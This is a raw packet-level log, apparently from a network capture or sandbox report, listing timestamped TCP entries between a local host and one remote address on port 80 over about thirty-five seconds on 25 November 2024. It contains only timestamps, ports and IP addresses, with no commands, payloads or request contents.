Nov 25, 2024 22:38:25.847944975 CET	49842	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:25.967601061 CET	80	49836	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:25.967992067 CET	80	49842	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:25.968072891 CET	49836	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:25.968115091 CET	49842	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:25.968277931 CET	49842	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:26.088413954 CET	80	49842	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:26.359005928 CET	49842	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:26.479090929 CET	80	49842	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:26.866872072 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:26.871064901 CET	49842	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:26.986896992 CET	80	49844	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:26.986968040 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:26.987076044 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:26.991380930 CET	80	49842	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:26.991440058 CET	49842	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:27.023658037 CET	49845	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:27.107494116 CET	80	49844	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:27.143821955 CET	80	49845	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:27.144001007 CET	49845	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:27.144087076 CET	49845	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:27.264327049 CET	80	49845	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:27.333187103 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:27.453291893 CET	80	49844	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:27.453500032 CET	80	49844	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:27.489392042 CET	49845	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:27.613655090 CET	80	49845	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.257292032 CET	80	49844	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.317435026 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.460527897 CET	80	49845	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.491801977 CET	80	49844	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.504921913 CET	49845	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.705116987 CET	80	49845	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.708076000 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.851386070 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.851461887 CET	49845	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.853166103 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.971801996 CET	80	49844	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.972326040 CET	80	49845	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.972384930 CET	49844	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.972398996 CET	49845	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.973237038 CET	80	49850	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:28.973778009 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:28.973983049 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:29.093943119 CET	80	49850	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:29.333400965 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:29.453557968 CET	80	49850	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:30.396142960 CET	80	49850	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:30.520545006 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:30.650590897 CET	80	49850	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:30.708056927 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:30.773823977 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:30.774590969 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:30.894320965 CET	80	49850	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:30.894562006 CET	80	49856	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:30.894629955 CET	49850	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:30.894669056 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:30.894843102 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:31.014738083 CET	80	49856	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:31.239448071 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:31.359718084 CET	80	49856	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:32.173028946 CET	80	49856	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:32.317440033 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:32.407680035 CET	80	49856	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:32.520560980 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:32.532557011 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:32.533132076 CET	49862	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:32.652894974 CET	80	49856	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:32.652951002 CET	49856	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:32.653198004 CET	80	49862	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:32.653275013 CET	49862	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:32.653418064 CET	49862	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:32.773679972 CET	80	49862	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.005213022 CET	49862	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.125272036 CET	80	49862	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.506274939 CET	49863	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.506510019 CET	49862	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.626349926 CET	80	49863	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.627334118 CET	49863	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.627557039 CET	49863	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.629090071 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.667800903 CET	80	49862	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.674197912 CET	80	49862	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.678005934 CET	49862	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.747437000 CET	80	49863	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.750145912 CET	80	49864	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.750225067 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.750394106 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:33.870310068 CET	80	49864	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:33.973869085 CET	49863	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:34.094090939 CET	80	49863	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:34.094122887 CET	80	49863	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:34.098864079 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:34.218904018 CET	80	49864	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:34.989742041 CET	80	49863	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.020371914 CET	80	49864	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.098711014 CET	49863	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.208082914 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.253308058 CET	80	49863	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.255645990 CET	80	49864	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.317451954 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.395519018 CET	49863	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.395909071 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.396529913 CET	49870	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.515921116 CET	80	49863	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.515986919 CET	49863	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.516297102 CET	80	49864	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.516351938 CET	49864	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.516494036 CET	80	49870	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.516575098 CET	49870	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.516689062 CET	49870	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.636606932 CET	80	49870	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:35.864422083 CET	49870	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:35.986399889 CET	80	49870	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:36.851155043 CET	80	49870	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:37.020629883 CET	49870	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:37.093024969 CET	80	49870	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:37.317492962 CET	49870	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:37.408835888 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:37.529000998 CET	80	49872	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:37.529073954 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:37.529242992 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:37.649336100 CET	80	49872	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:37.880199909 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:38.000286102 CET	80	49872	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:38.846045017 CET	80	49872	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:38.895637989 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.093179941 CET	80	49872	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:39.208148003 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.221421957 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.222206116 CET	49878	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.341825962 CET	80	49872	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:39.341901064 CET	49872	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.342189074 CET	80	49878	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:39.342287064 CET	49878	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.342401981 CET	49878	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.462450027 CET	80	49878	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:39.692656994 CET	49878	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:39.812730074 CET	80	49878	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.256764889 CET	49883	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.257204056 CET	49878	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.377243996 CET	80	49883	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.377331972 CET	49883	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.377465010 CET	49883	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.377614975 CET	80	49878	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.377682924 CET	49878	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.378068924 CET	49870	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.379585981 CET	49884	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.497720957 CET	80	49883	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.499622107 CET	80	49884	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.499691963 CET	49884	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.499844074 CET	49884	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.620306969 CET	80	49884	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.723898888 CET	49883	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.844018936 CET	80	49883	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.844077110 CET	80	49883	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:40.848948956 CET	49884	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:40.969075918 CET	80	49884	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:41.741570950 CET	80	49883	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:41.816144943 CET	80	49884	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:41.895637035 CET	49883	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:41.994468927 CET	80	49883	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:42.020656109 CET	49884	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.061177015 CET	80	49884	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:42.196849108 CET	49883	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.196913004 CET	49884	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.198091030 CET	49886	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.317362070 CET	80	49883	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:42.317425013 CET	49883	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.317468882 CET	80	49884	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:42.317517996 CET	49884	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.318093061 CET	80	49886	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:42.318161964 CET	49886	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.318300962 CET	49886	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.438277960 CET	80	49886	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:42.680629015 CET	49886	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:42.800764084 CET	80	49886	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:43.743849039 CET	80	49886	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:43.895638943 CET	49886	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:43.994277000 CET	80	49886	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:44.109932899 CET	49886	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:44.110743999 CET	49891	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:44.230247974 CET	80	49886	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:44.230308056 CET	49886	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:44.230704069 CET	80	49891	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:44.230829954 CET	49891	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:44.230937004 CET	49891	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:44.351006031 CET	80	49891	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:44.583214998 CET	49891	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:44.703363895 CET	80	49891	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:45.550388098 CET	80	49891	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:45.708163977 CET	49891	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:45.793061018 CET	80	49891	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:45.913599968 CET	49891	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:45.914777040 CET	49895	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:46.035828114 CET	80	49891	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:46.035882950 CET	49891	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:46.036490917 CET	80	49895	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:46.036564112 CET	49895	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:46.036725044 CET	49895	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:46.156667948 CET	80	49895	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:46.395750046 CET	49895	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:46.515993118 CET	80	49895	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.006370068 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.006637096 CET	49895	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.126483917 CET	80	49897	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.126997948 CET	80	49895	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.127106905 CET	49895	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.127115965 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.127258062 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.240361929 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.247237921 CET	80	49897	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.361376047 CET	80	49899	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.361628056 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.361694098 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.474391937 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.481722116 CET	80	49899	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.594495058 CET	80	49897	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.594538927 CET	80	49897	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:47.708271027 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:47.828310013 CET	80	49899	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:48.494791031 CET	80	49897	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:48.708161116 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:48.724236965 CET	80	49899	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:48.746434927 CET	80	49897	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:48.817550898 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:48.845397949 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:48.978351116 CET	80	49899	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:49.020656109 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.097313881 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.097393036 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.098325014 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.218183041 CET	80	49897	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:49.218660116 CET	49897	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.218709946 CET	80	49899	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:49.218738079 CET	80	49903	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:49.218780994 CET	49899	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.218816996 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.218961954 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.338871002 CET	80	49903	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:49.567672968 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:49.688095093 CET	80	49903	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:50.559544086 CET	80	49903	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:50.708177090 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:50.801122904 CET	80	49903	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:50.895683050 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:50.960714102 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:50.964761019 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:51.081490993 CET	80	49903	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:51.081547022 CET	49903	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:51.084687948 CET	80	49906	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:51.084768057 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:51.084918976 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:51.205252886 CET	80	49906	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:51.442698956 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:51.562752008 CET	80	49906	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:52.447654963 CET	80	49906	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:52.520725012 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:52.698419094 CET	80	49906	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:52.817563057 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:52.821856022 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:52.822976112 CET	49910	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:52.942348957 CET	80	49906	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:52.942424059 CET	49906	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:52.942945004 CET	80	49910	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:52.943198919 CET	49910	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:52.943392992 CET	49910	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:53.063275099 CET	80	49910	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:53.310233116 CET	49910	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:53.430356026 CET	80	49910	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:53.760054111 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:53.760397911 CET	49910	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:53.880012035 CET	80	49914	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:53.880160093 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:53.880311012 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:53.917614937 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:53.926945925 CET	80	49910	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:53.926992893 CET	49910	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:54.000401020 CET	80	49914	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:54.037642002 CET	80	49916	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:54.037713051 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:54.037837029 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:54.157912970 CET	80	49916	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:54.239602089 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:54.359868050 CET	80	49914	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:54.359905958 CET	80	49914	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:54.395785093 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:54.515969038 CET	80	49916	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.195949078 CET	80	49914	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.317591906 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.353879929 CET	80	49916	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.437019110 CET	80	49914	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.520720005 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.521186113 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.597100019 CET	80	49916	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.708226919 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.721268892 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.721338987 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.722408056 CET	49918	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.841609001 CET	80	49914	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.841640949 CET	80	49916	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.841739893 CET	49914	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.841770887 CET	49916	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.842328072 CET	80	49918	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:55.843777895 CET	49918	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.844305992 CET	49918	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:55.964195967 CET	80	49918	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:56.194946051 CET	49918	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:56.315193892 CET	80	49918	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:57.210812092 CET	80	49918	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:57.351484060 CET	49918	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:57.471812010 CET	80	49918	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:57.604450941 CET	49918	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:57.605140924 CET	49922	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:57.725107908 CET	80	49918	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:57.725204945 CET	80	49922	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:57.725321054 CET	49918	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:57.725411892 CET	49922	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:57.725780010 CET	49922	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:57.846148968 CET	80	49922	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:58.083311081 CET	49922	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:58.255400896 CET	80	49922	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:59.045984983 CET	80	49922	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:59.208239079 CET	49922	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:59.293308973 CET	80	49922	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:59.333214998 CET	49922	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:59.667933941 CET	49927	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:59.788199902 CET	80	49927	37.44.238.250	192.168.2.4
Nov 25, 2024 22:38:59.788428068 CET	49927	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:59.788508892 CET	49927	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:38:59.908418894 CET	80	49927	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:00.145854950 CET	49927	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.265902042 CET	80	49927	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:00.444174051 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.468318939 CET	49927	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.564307928 CET	80	49929	37.44.238.250	192.168.2.4
Nov 25, 2024 22:39:00.565570116 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.565722942 CET	49929	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.611695051 CET	49930	80	192.168.2.4	37.44.238.250
Nov 25, 2024 22:39:00.631917000 CET	80	49927	37.44.238.250	192.168.2.4
